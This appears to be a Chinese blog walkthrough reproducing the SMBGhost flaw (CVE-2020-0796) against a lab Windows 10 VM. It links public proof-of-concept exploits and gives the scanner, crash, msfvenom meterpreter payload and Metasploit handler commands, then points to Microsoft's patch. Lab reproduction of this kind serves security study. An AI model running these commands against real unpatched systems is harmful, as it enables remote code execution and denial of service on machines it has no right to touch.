CVE-2020-0796漏洞復現(win10系統)

前言:

Microsoft Windows和Microsoft Windows Server都是美國微軟(Microsoft)公司的產品,Microsoft Windows是一套個人設備使用的操作系統,Microsoft Windows Server是一套服務器操作系統,Server Message Block是其中的一個服務器信息傳輸協議。
微軟公佈了在Server Message Block 3.0(SMBv3)中發現的“蠕蟲型”預授權遠程代碼執行漏洞。

影響版本:

	適用於32位系統的Windows 10版本1903
	Windows 10 1903版(用於基於x64的系統)
	Windows 10 1903版(用於基於ARM64的系統)
	Windows Server 1903版(服務器核心安裝)
	適用於32位系統的Windows 10版本1909
	Windows 10版本1909(用於基於x64的系統)
	Windows 10 1909版(用於基於ARM64的系統)
	Windows Server版本1909(服務器核心安裝)

系統版本查看:

在這裏插入圖片描述

漏洞復現:

靶機:win10虛擬機、ip:192.168.142.129(防火牆關閉)
攻擊機:kali虛擬機、ip:192.168.142.128
1:檢測系統是否存在漏洞

git下載地址:https://github.com/ollypwn/SMBGhost

python3 scanner.py 目標ip地址

在這裏插入圖片描述
2:藍屏POC:
POC下載地址:https://github.com/eerykitty/CVE-2020-0796-PoC

python3 setup.py install
python3 CVE-2020-0796.py 目標ip地址

在這裏插入圖片描述在這裏插入圖片描述
在這裏插入圖片描述
3:提權POC提權:
POC下載地址:https://github.com/danigargu/CVE-2020-0796
第一步:msf生成反向連接木馬:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

在這裏插入圖片描述
第二步:替換POC中exploit.py中USER_PAYLOAD的代碼,並且將buf修改爲USER_PAYLOAD
在這裏插入圖片描述
第三步:啓動msf

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //監聽端口
set rhost 192.168.1.143 //目標主機
run

在這裏插入圖片描述

第四步:運行poc,自動建立連接
在這裏插入圖片描述在這裏插入圖片描述

修復方式:

微軟已經發布了此漏洞的安全補丁,訪問如下鏈接:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章